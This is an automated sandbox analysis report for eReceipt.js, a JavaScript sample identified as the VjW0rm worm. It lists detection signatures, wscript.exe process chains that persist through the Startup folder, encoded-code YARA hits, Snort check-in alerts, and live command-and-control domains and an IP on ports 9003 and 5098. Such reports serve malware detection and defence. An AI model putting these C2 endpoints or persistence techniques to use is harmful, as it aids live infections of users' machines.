Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eReceipt.js

Overview

General Information

Sample Name:eReceipt.js
Analysis ID:628800
MD5:00073a5b3551f0759bf070f9954c96c0
SHA1:c68e16991a3453fc8a33abe802421830efaa1fec
SHA256:c8238e4ba5d2aafcb132239f682f11ba67387adc8abc80ac0614d3dbe3634e6d
Tags:jsVjw0rm
Infos:

Detection

VjW0rm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Wscript called in batch mode (surpress errors)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Potential malicious VBS/JS script found (suspicious encoded strings)
Creates multiple autostart registry keys
Drops script or batch files to the startup folder
Uses known network protocols on non-standard ports
JavaScript source code contains call to eval containing suspicious API calls
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Creates a start menu entry (Start Menu\Programs\Startup)
Stores files to the Windows start menu directory
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3908 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\eReceipt.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 5516 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 6860 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6652 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 4448 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 5768 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 2312 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 5512 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 792 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6408 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 1928 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.880440429.0000011D6BAC4000.00000004.00000020.00020000.00000000.sdmpSUSP_Base64_Encoded_Hex_Encoded_CodeDetects hex encoded code that has been base64 encodedFlorian Roth
  • 0x14f28:$x1: 78 34 4E 7A 4A 63 65 44 51 78 58 48 67
  • 0x1520c:$x1: 78 34 4E 6A 46 63 65 44 63 30 58 48 67
  • 0x16cec:$x1: 78 34 4E 6D 5A 63 65 44 59 30 58 48 67
  • 0x16cfc:$x1: 78 34 4E 54 4E 63 65 44 63 30 58 48 67
  • 0x16f30:$x1: 78 34 4E 32 56 63 65 44 4E 6C 58 48 67
  • 0x16f50:$x1: 78 34 4E 6A 52 63 65 44 51 79 58 48 67
  • 0x16ffc:$x1: 78 34 4E 6D 56 63 65 44 59 7A 58 48 67
  • 0x1700c:$x1: 78 34 4E 6A 6C 63 65 44 5A 6D 58 48 67
  • 0x1702c:$x1: 78 34 4E 7A 5A 63 65 44 59 78 58 48 67
  • 0x1709c:$x1: 78 34 4E 6A 5A 63 65 44 49 34 58 48 67
  • 0x170ac:$x1: 78 34 4E 54 52 63 65 44 4A 6C 58 48 67
  • 0x170bc:$x1: 78 34 4E 57 4A 63 65 44 49 34 58 48 67
  • 0x170cc:$x1: 78 34 4E 7A 6C 63 65 44 63 77 58 48 67
  • 0x170dc:$x1: 78 34 4E 6D 5A 63 65 44 59 32 58 48 67
  • 0x170ec:$x1: 78 34 4E 6A 46 63 65 44 59 79 58 48 67
  • 0x17644:$x1: 78 34 4E 7A 5A 63 65 44 59 78 58 48 67
  • 0x178c8:$x1: 78 34 4E 6D 4E 63 65 44 5A 6B 58 48 67
  • 0x178d8:$x1: 78 34 4E 6D 5A 63 65 44 49 30 58 48 67
  • 0x17a40:$x1: 78 34 4E 6A 46 63 65 44 5A 6D 58 48 67
  • 0x17ab0:$x1: 78 34 4E 6D 5A 63 65 44 5A 6B 58 48 67
  • 0x17ac0:$x1: 78 34 4E 6A 64 63 65 44 59 78 58 48 67
00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VjW0rmYara detected VjW0rmJoe Security
    00000010.00000002.882089368.00000244AF3F0000.00000004.00000020.00020000.00000000.sdmpSUSP_Base64_Encoded_Hex_Encoded_CodeDetects hex encoded code that has been base64 encodedFlorian Roth
    • 0x8124:$x1: 78 34 4E 6D 56 63 65 44 63 32 58 48 67
    • 0x8134:$x1: 78 34 4E 6D 4E 63 65 44 59 35 58 48 67
    • 0x8154:$x1: 78 34 4E 7A 52 63 65 44 59 78 58 48 67
    • 0x8164:$x1: 78 34 4E 6D 4A 63 65 44 59 31 58 48 67
    • 0x8184:$x1: 78 34 4E 6D 5A 63 65 44 63 32 58 48 67
    • 0x8194:$x1: 78 34 4E 6A 52 63 65 44 59 31 58 48 67
    • 0x81b4:$x1: 78 34 4E 6D 5A 63 65 44 63 30 58 48 67
    • 0x81c4:$x1: 78 34 4E 7A 52 63 65 44 63 35 58 48 67
    • 0x81d4:$x1: 78 34 4E 6A 56 63 65 44 49 77 58 48 67
    • 0x81e4:$x1: 78 34 4E 7A 52 63 65 44 63 79 58 48 67
    • 0x81f4:$x1: 78 34 4E 6D 56 63 65 44 59 33 58 48 67
    • 0x84b4:$x1: 78 34 4E 7A 4A 63 65 44 59 35 58 48 67
    • 0x84c4:$x1: 78 34 4E 6D 4E 63 65 44 59 35 58 48 67
    • 0x84d4:$x1: 78 34 4E 6A 46 63 65 44 63 30 58 48 67
    • 0x84e4:$x1: 78 34 4E 6D 5A 63 65 44 5A 6C 58 48 67
    • 0x84f4:$x1: 78 34 4E 6A 56 63 65 44 63 79 58 48 67
    • 0x8504:$x1: 78 34 4E 6D 5A 63 65 44 63 79 58 48 67
    • 0x8514:$x1: 78 34 4E 6A 5A 63 65 44 5A 6D 58 48 67
    • 0x8534:$x1: 78 34 4E 7A 52 63 65 44 59 78 58 48 67
    • 0x85f0:$x1: 78 34 4E 6D 4E 63 65 44 59 78 58 48 67
    • 0x8600:$x1: 78 34 4E 6A 46 63 65 44 63 32 58 48 67
    00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VjW0rmYara detected VjW0rmJoe Security
      00000000.00000002.881750287.000001C6DCC58000.00000004.00000020.00020000.00000000.sdmpSUSP_Base64_Encoded_Hex_Encoded_CodeDetects hex encoded code that has been base64 encodedFlorian Roth
      • 0x9034:$x1: 78 34 4E 6D 56 63 65 44 63 32 58 48 67
      • 0x9044:$x1: 78 34 4E 6D 4E 63 65 44 59 35 58 48 67
      • 0x9064:$x1: 78 34 4E 7A 52 63 65 44 59 78 58 48 67
      • 0x9074:$x1: 78 34 4E 6D 4A 63 65 44 59 31 58 48 67
      • 0x9094:$x1: 78 34 4E 6D 5A 63 65 44 63 32 58 48 67
      • 0x90a4:$x1: 78 34 4E 6A 52 63 65 44 59 31 58 48 67
      • 0x90c4:$x1: 78 34 4E 6D 5A 63 65 44 63 30 58 48 67
      • 0x90d4:$x1: 78 34 4E 7A 52 63 65 44 63 35 58 48 67
      • 0x90e4:$x1: 78 34 4E 6A 56 63 65 44 49 77 58 48 67
      • 0x90f4:$x1: 78 34 4E 7A 52 63 65 44 63 79 58 48 67
      • 0x9104:$x1: 78 34 4E 6D 56 63 65 44 59 33 58 48 67
      • 0x93c4:$x1: 78 34 4E 7A 4A 63 65 44 59 35 58 48 67
      • 0x93d4:$x1: 78 34 4E 6D 4E 63 65 44 59 35 58 48 67
      • 0x93e4:$x1: 78 34 4E 6A 46 63 65 44 63 30 58 48 67
      • 0x93f4:$x1: 78 34 4E 6D 5A 63 65 44 5A 6C 58 48 67
      • 0x9404:$x1: 78 34 4E 6A 56 63 65 44 63 79 58 48 67
      • 0x9414:$x1: 78 34 4E 6D 5A 63 65 44 63 79 58 48 67
      • 0x9424:$x1: 78 34 4E 6A 5A 63 65 44 5A 6D 58 48 67
      • 0x9444:$x1: 78 34 4E 7A 52 63 65 44 59 78 58 48 67
      • 0x9500:$x1: 78 34 4E 6D 4E 63 65 44 59 78 58 48 67
      • 0x9510:$x1: 78 34 4E 6A 46 63 65 44 63 32 58 48 67
      Click to see the 45 entries

      Sigma Signatures

      Data Obfuscation

      barindex
      Sigma detected: Drops script at startup location
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 3908, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js

      Snort Signatures

      Timestamp:192.168.2.7212.193.30.1294977290032828283 05/17/22-23:13:15.273410
      SID:2828283
      Source Port:49772
      Destination Port:9003
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.7212.193.30.1294976290032828283 05/17/22-23:10:33.772326
      SID:2828283
      Source Port:49762
      Destination Port:9003
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.7212.193.30.1294978890032828283 05/17/22-23:13:30.858787
      SID:2828283
      Source Port:49788
      Destination Port:9003
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.7212.193.30.1294978190032828283 05/17/22-23:13:08.959758
      SID:2828283
      Source Port:49781
      Destination Port:9003
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: eReceipt.jsReversingLabs: Detection: 19%
      Antivirus detection for URL or domain
      Source: http://travcharles.duia.ro:5098Avira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URL
      Source: zeegod.duckdns.orgVirustotal: Detection: 9%Perma Link
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

      Software Vulnerabilities

      barindex
      JavaScript source code contains call to eval containing suspicious API calls
      Source: eReceipt.jsArgument value: ['"hober$$$$=WSH.CreateObject("adodb.stream")"', '"var lmao$$$_=WSH.CreateObject("microsoft.xmldom").createElement("mko")"']Go to definition

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\System32\wscript.exeNetwork Connect: 212.193.30.129 9003Jump to behavior
      Source: C:\Windows\System32\wscript.exeDomain query: zeegod.duckdns.org
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2828283 ETPRO TROJAN VJworm Checkin 192.168.2.7:49762 -> 212.193.30.129:9003
      Source: TrafficSnort IDS: 2828283 ETPRO TROJAN VJworm Checkin 192.168.2.7:49772 -> 212.193.30.129:9003
      Source: TrafficSnort IDS: 2828283 ETPRO TROJAN VJworm Checkin 192.168.2.7:49781 -> 212.193.30.129:9003
      Source: TrafficSnort IDS: 2828283 ETPRO TROJAN VJworm Checkin 192.168.2.7:49788 -> 212.193.30.129:9003
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Uses dynamic DNS services
      Source: unknownDNS query: name: zeegod.duckdns.org
      Source: global trafficTCP traffic: 192.168.2.7:49762 -> 212.193.30.129:9003
      Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
      Source: wscript.exe, 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.879648858.000000D426DC1000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098
      Source: wscript.exe, 00000012.00000002.880111499.0000026BB17E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre
      Source: wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre%
      Source: wscript.exe, 00000001.00000002.881152946.000001FE424AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre0
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre563209-4053062332-100
      Source: wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre783C6-CB41-11D1-8B02-00600806D9B6
      Source: wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre7E9B0-70EF-11D1-B75A-00A0C90564FE
      Source: wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreE
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreM
      Source: wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreM8
      Source: wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMH
      Source: wscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827815477.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMcroWinows
      Source: wscript.exe, 0000000A.00000002.880775140.00000239F8B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMcroWinowsiniF
      Source: wscript.exe, 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMcroWinowsiniG
      Source: wscript.exe, 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMcroWinowsu
      Source: wscript.exe, 0000000C.00000002.881056298.00000171E0430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMicrosoft
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreS~1
      Source: wscript.exe, 00000001.00000002.881152946.000001FE424AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.880995729.00000239F8BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreWOW64
      Source: wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreY
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreZ
      Source: wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vrea
      Source: wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.880111499.0000026BB17E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vredesk
      Source: wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vree
      Source: wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vref:
      Source: wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vrei
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vreosoft
      Source: wscript.exe, 00000001.00000002.880864667.000001FE4244C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vreosoft.xmldom
      Source: wscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vrep
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vrer
      Source: wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org/
      Source: wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org/telPROCESSOR_LEVEL=6PROCESSOR_RC
      Source: wscript.exe, 00000010.00000002.884207305.00000244AFE70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.457112240.00000244AF413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/
      Source: wscript.exe, 00000000.00000003.354426581.000001C6DCBAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.354234861.000001C6DCBAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.881556438.000001C6DCBAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.458352994.00000244AF37E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.881936001.00000244AF37E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Ag
      Source: wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre
      Source: wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre#
      Source: wscript.exe, 00000005.00000002.884039179.000001B3A0690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre-z
      Source: wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre0
      Source: wscript.exe, 00000010.00000002.882947687.00000244AF47E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre0&
      Source: wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre2
      Source: wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre5
      Source: wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre5(
      Source: wscript.exe, 00000005.00000002.884584250.000001B3A1169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre5BP
      Source: wscript.exe, 00000009.00000002.883203781.0000011D6E515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre798AD7C45B15A
      Source: wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre7DQpmb3Ig
      Source: wscript.exe, 00000009.00000002.881854049.0000011D6D8E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre?Lw
      Source: wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreB
      Source: wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreICAgICAgICAgICAgIC
      Source: wscript.exe, 00000009.00000002.882763356.0000011D6E4A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreJ
      Source: wscript.exe, 00000005.00000002.883505845.000001B3A05C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.881803714.0000011D6D8B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883452838.00000244AF4E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.879910035.00000244AD532000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreM
      Source: wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreMcroWinows
      Source: wscript.exe, 00000010.00000002.882947687.00000244AF47E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreMcroWinows1
